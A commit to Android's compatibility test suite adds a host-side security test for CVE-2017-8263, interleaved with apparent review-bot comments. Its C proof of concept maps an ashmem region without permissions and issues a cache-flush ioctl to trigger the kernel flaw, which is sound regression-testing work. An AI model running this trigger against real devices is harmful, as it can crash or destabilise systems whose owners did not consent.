CTS/STS test for Android Security b/34126808

Bug:34126808
Change-Id: I5d1f0c8e8699e738363a773ed0155b55b912e9f9
(cherry picked from commit 74e0acf613e1b49e18e0f0aaeba810a667e1d2e6)
diff --git a/hostsidetests/security/AndroidTest.xml b/hostsidetests/security/AndroidTest.xml
index 7c0783c..3c52d9d 100644
--- a/hostsidetests/security/AndroidTest.xml
+++ b/hostsidetests/security/AndroidTest.xml
@@ -62,6 +62,7 @@
         <option name="push" value="Bug-35048450->/data/local/tmp/Bug-35048450" />
         <option name="push" value="Bug-35047217->/data/local/tmp/Bug-35047217" />
         <option name="push" value="CVE-2017-0705->/data/local/tmp/CVE-2017-0705" />
+        <option name="push" value="CVE-2017-8263->/data/local/tmp/CVE-2017-8263" />
         <option name="append-bitness" value="true" />
     </target_preparer>
     <test class="com.android.compatibility.common.tradefed.testtype.JarHostTest" >
diff --git a/hostsidetests/security/securityPatch/CVE-2017-8263/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-8263/Android.mk
new file mode 100644
index 0000000..0d1d60b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-8263/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-8263
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
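Review bot: The warning and hardening flags on the four `CFLAGS +=` lines, and `-rdynamic` on `LDFLAGS +=`, are assigned to plain make variables rather than the module's `LOCAL_` variables, so they are probably never passed to the compiler or linker for this module; only `LOCAL_LDFLAGS += -fPIE -pie` uses the per-module form. If `-Wall -W -D_FORTIFY_SOURCE=2` and the rest are meant to apply to poc.c, write them as `LOCAL_CFLAGS += ...` and `LOCAL_LDFLAGS += -rdynamic`. `-Iinclude` names a directory this commit does not add and can be dropped.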

diff --git a/hostsidetests/security/securityPatch/CVE-2017-8263/local_poc.h b/hostsidetests/security/securityPatch/CVE-2017-8263/local_poc.h
new file mode 100644
index 0000000..a75782b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-8263/local_poc.h
@@ -0,0 +1,50 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#ifndef _LINUX_ASHMEM_H
+#define _LINUX_ASHMEM_H
+#include <linux/limits.h>
+#include <linux/ioctl.h>
+#define ASHMEM_NAME_LEN   256
+#define ASHMEM_NAME_DEF   "dev/ashmem"
+ /* Return values from ASHMEM_PIN: Was the mapping purged while unpinned? */
+#define ASHMEM_NOT_PURGED 0
+#define ASHMEM_WAS_PURGED 1
+ /* Return values from ASHMEM_GET_PIN_STATUS: Is the mapping pinned? */
+#define ASHMEM_IS_UNPINNED  0
+#define ASHMEM_IS_PINNED  1
+struct ashmem_pin {
+    __u32 offset; /* offset into region, in bytes, page-aligned */
+    __u32 len;  /* length forward from offset, in bytes, page-aligned */
+};
+#define __ASHMEMIOC   0x77
+#define ASHMEM_SET_NAME   _IOW(__ASHMEMIOC, 1, char[ASHMEM_NAME_LEN])
+#define ASHMEM_GET_NAME   _IOR(__ASHMEMIOC, 2, char[ASHMEM_NAME_LEN])
+#define ASHMEM_SET_SIZE   _IOW(__ASHMEMIOC, 3, size_t)
+#define ASHMEM_GET_SIZE   _IO(__ASHMEMIOC, 4)
+#define ASHMEM_SET_PROT_MASK  _IOW(__ASHMEMIOC, 5, unsigned long)
+#define ASHMEM_GET_PROT_MASK  _IO(__ASHMEMIOC, 6)
+#define ASHMEM_PIN    _IOW(__ASHMEMIOC, 7, struct ashmem_pin)
+#define ASHMEM_UNPIN    _IOW(__ASHMEMIOC, 8, struct ashmem_pin)
+#define ASHMEM_GET_PIN_STATUS _IO(__ASHMEMIOC, 9)
+#define ASHMEM_PURGE_ALL_CACHES _IO(__ASHMEMIOC, 10)
+#define ASHMEM_CACHE_FLUSH_RANGE  _IO(__ASHMEMIOC, 11)
+#define ASHMEM_CACHE_CLEAN_RANGE  _IO(__ASHMEMIOC, 12)
+#define ASHMEM_CACHE_INV_RANGE    _IO(__ASHMEMIOC, 13)
+int get_ashmem_file(int fd, struct file **filp, struct file **vm_file,
+                          unsigned long *len);
+void put_ashmem_file(struct file *file);
+#endif  /* _LINUX_ASHMEM_H */
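Review bot: The two prototypes at the end of the header, `get_ashmem_file(...)` and `put_ashmem_file(...)`, are kernel-internal and refer to `struct file`, which userspace does not define; poc.c uses neither, so they should be removed. The header also relies on some other include to define `__u32` (adding `#include <linux/types.h>` makes it self-contained) and reuses the guard `_LINUX_ASHMEM_H`, which looks like the name a system ashmem header would use and could suppress it if both were ever included; a local name such as `LOCAL_POC_ASHMEM_H` avoids that. A short comment stating which kernel tree ioctl numbers 10 to 13 (`ASHMEM_PURGE_ALL_CACHES`, `ASHMEM_CACHE_*_RANGE`) were copied from would explain why this private copy exists.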
diff --git a/hostsidetests/security/securityPatch/CVE-2017-8263/poc.c b/hostsidetests/security/securityPatch/CVE-2017-8263/poc.c
new file mode 100644
index 0000000..687bbc5
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-8263/poc.c
@@ -0,0 +1,51 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define _GNU_SOURCE
+#include <fcntl.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <stdio.h>
+#include "local_poc.h"
+
+
+int main() {
+    int fd;
+    int ret;
+    uint64_t mmap_ret;
+
+    fd = open("/dev/ashmem", 0, 0);
+    if (fd < 0) {
+        return -1;
+    }
+
+    ret = ioctl(fd, ASHMEM_SET_SIZE, 0x1000);
+    if (ret < 0) {
+        return -1;
+    }
+
+    mmap_ret = (uint64_t) mmap((void *) 0x7f0000000 /*addr*/, 0x1000 /*length*/, 0x0 /*prot*/,
+            0x12 /*flags=MAP_FIXED|MAP_PRIVATE*/, fd, 0x0 /*offset*/);
+    if (mmap_ret == MAP_FAILED) {
+        return -1;
+    }
+
+    ret = ioctl(fd, ASHMEM_CACHE_FLUSH_RANGE, NULL);
+    if (ret < 0) {
+        return -1;
+    }
+    return 0;
+}
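Review bot: The mmap result is cast to `uint64_t` and then compared with `MAP_FAILED`, which is a `void *`, so the check is an integer-to-pointer comparison, and `uint64_t` is used without `<stdint.h>`. Keep the result as a pointer: `void *map = mmap((void *) 0x7f0000000, 0x1000, PROT_NONE, MAP_FIXED | MAP_PRIVATE, fd, 0);` followed by `if (map == MAP_FAILED)`. Android.mk in this commit sets `LOCAL_MULTILIB := both`, and the literal `0x7f0000000` does not fit a 32-bit pointer, so the 32-bit binary would request a different address than the one written. `open("/dev/ashmem", 0, 0)` reads more clearly as `open("/dev/ashmem", O_RDONLY)`, and `int main()` should be `int main(void)`.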
diff --git a/hostsidetests/security/src/android/security/cts/Poc17_07.java b/hostsidetests/security/src/android/security/cts/Poc17_07.java
index 8a76f13..6c4a2f3 100644
--- a/hostsidetests/security/src/android/security/cts/Poc17_07.java
+++ b/hostsidetests/security/src/android/security/cts/Poc17_07.java
@@ -53,4 +53,15 @@
             AdbUtils.runPoc("CVE-2017-0705", getDevice(), 60);
         }
     }
+
+    /**
+     *  b/34126808
+     */
+    @SecurityTest
+    public void testPocCVE_2017_8263() throws Exception {
+        enableAdbRoot(getDevice());
+        if(containsDriver(getDevice(), "/dev/ashmem")) {
+            AdbUtils.runPoc("CVE-2017-8263", getDevice(), 60);
+        }
+    }
 }
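Review bot: `testPocCVE_2017_8263` asserts nothing: the result of `AdbUtils.runPoc`, if it returns one, is not checked, so as far as this hunk shows the test can only fail through an exception or the 60-second timeout, and it passes silently when `/dev/ashmem` is absent. If the intended signal is that the device survives the PoC, say so in the Javadoc, which currently holds only the bug number, for example `b/34126808: cache-flush ioctl on an ashmem mapping must not crash the device`. `if(` also wants a space after the keyword. The enclosing class starts outside the hunk.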